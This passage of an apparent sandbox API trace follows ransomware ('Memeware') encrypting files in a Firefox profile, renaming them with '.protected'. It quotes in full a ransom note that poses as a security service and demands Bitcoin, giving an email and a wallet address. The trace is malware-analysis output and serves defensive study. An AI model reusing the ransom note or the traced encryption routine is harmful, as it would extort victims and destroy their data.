pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.523] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite") returned 115 [0086.523] StrStrW (lpFirst="index.sqlite", lpSrch=".txt") returned 0x0 [0086.523] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite") returned 115 [0086.523] StrStrW (lpFirst="index.sqlite", lpSrch=".rar") returned 0x0 [0086.523] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite") returned 115 [0086.523] StrStrW (lpFirst="index.sqlite", lpSrch=".zip") returned 0x0 [0086.523] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.525] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.525] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.525] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.525] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.526] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.526] CloseHandle (hObject=0x158) returned 1 [0086.533] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite.protected") returned 125 [0086.533] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite.protected")) returned 1 [0086.534] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0086.534] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0086.534] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\RESTORE_FILES.txt") returned 120 [0086.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.535] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.535] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0086.536] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.536] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.536] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.536] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0086.536] CloseHandle (hObject=0x154) returned 1 [0086.536] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.536] lstrcmpiW (lpString1="safebrowsing", lpString2="Windows") returned -1 [0086.536] lstrcmpiW (lpString1="safebrowsing", lpString2="Program Files") returned 1 [0086.536] lstrcmpiW (lpString1="safebrowsing", lpString2="Program Files (x86)") returned 1 [0086.536] lstrcmpiW (lpString1="safebrowsing", lpString2="$Recycle.bin") returned 1 [0086.536] lstrcmpiW (lpString1="safebrowsing", lpString2="System Volume Information") returned -1 [0086.536] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing") returned 102 [0086.537] lstrcmpW (lpString1="safebrowsing", lpString2=".") returned 1 [0086.537] lstrcmpW (lpString1="safebrowsing", lpString2="..") returned 1 [0086.537] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\*") returned 104 [0086.537] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0086.549] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.549] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.549] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.549] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.549] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.549] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\.") returned 104 [0086.549] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.549] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.549] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.549] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.550] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.550] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.550] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.550] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\..") returned 105 [0086.550] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.550] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.550] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.550] lstrcmpiW (lpString1="test-malware-simple.cache", lpString2="Windows") returned -1 [0086.550] lstrcmpiW (lpString1="test-malware-simple.cache", lpString2="Program Files") returned 1 [0086.550] lstrcmpiW (lpString1="test-malware-simple.cache", lpString2="Program Files (x86)") returned 1 [0086.550] lstrcmpiW (lpString1="test-malware-simple.cache", lpString2="$Recycle.bin") returned 1 [0086.550] lstrcmpiW (lpString1="test-malware-simple.cache", lpString2="System Volume Information") returned 1 [0086.550] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache") returned 128 [0086.550] StrStrIW (lpFirst="test-malware-simple.cache", lpSrch=".protected") returned 0x0 [0086.550] lstrcmpW (lpString1="test-malware-simple.cache", lpString2="RESTORE_FILES.txt") returned 1 [0086.550] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.550] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache") returned 128 [0086.551] StrStrW (lpFirst="test-malware-simple.cache", lpSrch=".txt") returned 0x0 [0086.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache") returned 128 [0086.551] StrStrW (lpFirst="test-malware-simple.cache", lpSrch=".rar") returned 0x0 [0086.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache") returned 128 [0086.551] StrStrW (lpFirst="test-malware-simple.cache", lpSrch=".zip") returned 0x0 [0086.551] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2c, lpOverlapped=0x0) returned 1 [0086.552] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.552] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2c, lpOverlapped=0x0) returned 1 [0086.553] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.553] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.553] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.553] CloseHandle (hObject=0x158) returned 1 [0086.553] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.protected") returned 138 [0086.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.protected")) returned 1 [0086.554] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.554] lstrcmpiW (lpString1="test-malware-simple.pset", lpString2="Windows") returned -1 [0086.554] lstrcmpiW (lpString1="test-malware-simple.pset", lpString2="Program Files") returned 1 [0086.554] lstrcmpiW (lpString1="test-malware-simple.pset", lpString2="Program Files (x86)") returned 1 [0086.554] lstrcmpiW (lpString1="test-malware-simple.pset", lpString2="$Recycle.bin") returned 1 [0086.554] lstrcmpiW (lpString1="test-malware-simple.pset", lpString2="System Volume Information") returned 1 [0086.554] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset") returned 127 [0086.554] StrStrIW (lpFirst="test-malware-simple.pset", lpSrch=".protected") returned 0x0 [0086.554] lstrcmpW (lpString1="test-malware-simple.pset", lpString2="RESTORE_FILES.txt") returned 1 [0086.554] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.554] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset") returned 127 [0086.555] StrStrW (lpFirst="test-malware-simple.pset", lpSrch=".txt") returned 0x0 [0086.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset") returned 127 [0086.555] StrStrW (lpFirst="test-malware-simple.pset", lpSrch=".rar") returned 0x0 [0086.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset") returned 127 [0086.555] StrStrW (lpFirst="test-malware-simple.pset", lpSrch=".zip") returned 0x0 [0086.555] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0086.556] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.556] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0086.556] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.556] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.556] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.556] CloseHandle (hObject=0x158) returned 1 [0086.556] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.protected") returned 137 [0086.557] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.protected")) returned 1 [0086.557] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.557] lstrcmpiW (lpString1="test-malware-simple.sbstore", lpString2="Windows") returned -1 [0086.557] lstrcmpiW (lpString1="test-malware-simple.sbstore", lpString2="Program Files") returned 1 [0086.557] lstrcmpiW (lpString1="test-malware-simple.sbstore", lpString2="Program Files (x86)") returned 1 [0086.557] lstrcmpiW (lpString1="test-malware-simple.sbstore", lpString2="$Recycle.bin") returned 1 [0086.558] lstrcmpiW (lpString1="test-malware-simple.sbstore", lpString2="System Volume Information") returned 1 [0086.558] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore") returned 130 [0086.558] StrStrIW (lpFirst="test-malware-simple.sbstore", lpSrch=".protected") returned 0x0 [0086.558] lstrcmpW (lpString1="test-malware-simple.sbstore", lpString2="RESTORE_FILES.txt") returned 1 [0086.558] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.558] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore") returned 130 [0086.558] StrStrW (lpFirst="test-malware-simple.sbstore", lpSrch=".txt") returned 0x0 [0086.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore") returned 130 [0086.558] StrStrW (lpFirst="test-malware-simple.sbstore", lpSrch=".rar") returned 0x0 [0086.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore") returned 130 [0086.558] StrStrW (lpFirst="test-malware-simple.sbstore", lpSrch=".zip") returned 0x0 [0086.559] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0xe8, lpOverlapped=0x0) returned 1 [0086.559] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.559] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0xe8, lpOverlapped=0x0) returned 1 [0086.560] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.560] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.560] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.560] CloseHandle (hObject=0x158) returned 1 [0086.560] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.protected") returned 140 [0086.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.protected")) returned 1 [0086.561] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.561] lstrcmpiW 